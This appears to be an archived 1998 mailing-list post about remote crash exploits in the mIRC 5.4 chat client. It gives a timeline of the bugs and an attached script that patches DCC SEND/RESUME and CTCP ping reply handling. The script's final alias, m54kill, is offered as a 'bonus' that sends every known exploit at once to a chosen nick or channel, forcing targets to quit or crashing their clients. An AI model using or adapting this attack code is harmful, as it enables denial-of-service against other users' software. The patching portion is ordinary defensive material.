--=====================_901297071==_ Content-Type: text/plain; charset="us-ascii" History of Events: (Remote Exploits) 07/18/98 - Someone on DALnet finds problem with DCC SEND and DCC RESUME (exploit made) 07/20/98 - $asctime bug revealed 07/21/98 - myn discovers a large problem with $calc and notices that most scripts that use on ctcpreply ping perform a $calc. He then implements the $asctime bug into on ctcpreply ping which ables a user to remotely crash the mIRC client 07/22/98 - v9 evaluates myn's bug finding and plays with on ctcpreply some more and finds that $calc evaluates custom alias's or functions. 07/23/98 - Some uninformed person believes that it is on IRCN native and posts a message to rootshell.com and forgets the big picture. Any mIRC script that makes use of the event "ON CTCPREPLY PING" which does a $calc or any other remote/event that uses $calc is exploitable. Most people are only patching themselves against the $calc bug, but are still wondering why their mIRC keeps crashing.. Its because they have not patched themselves against the 2 other remote mIRC exploits. Below is the patch for ALL known remote mIRC exploits. to install it type "/load -rs m54-fix-sploits.mrc" Peace. myn@efnet --=====================_901297071==_ Content-Type: text/plain; charset="us-ascii" Content-Disposition: attachment; filename="m54fix-sploits.mrc" ;mIRC 5.4 QuickFIX and Exploits ;myn@efnet - 07/22/98 ;Here is the Quick Fix for all know mIRC 5.4 Exploits to date (07/22/98) ;DCC exploit fix ctcp *:DCC SEND: { if $4 == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } } ctcp *:DCC RESUME: { if $4 == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } } ;ctcpreply ping $asctime crash and $identifier Exploit fix ;replace all instances of the event "on ctcpreply" with the one below on 1:CTCPREPLY:PING* { if (2147483647 isin $2) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt } if ($ isin $2-) { echo -a * Incoming ctcpreply identifier exploit --> $2- from $nick | halt } echo -a * [ $+ $nick PING reply]: $calc($ctime - $2-) sec(s) halt } ;And as an added bonus for all you DALnet kiddies ;This sends all known mIRC 5.4 exploits at once alias m54kill { if ($1) { .ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie) %ip = $rand(600000000,4294967294) .quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1) .ctcpreply $1 ping $!asctime(2147483647) echo -a * Sent mIRC kills to $1 halt } echo -a * Parms [/m54kill nick/#channel] } --=====================_901297071==_--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:07:49 PDT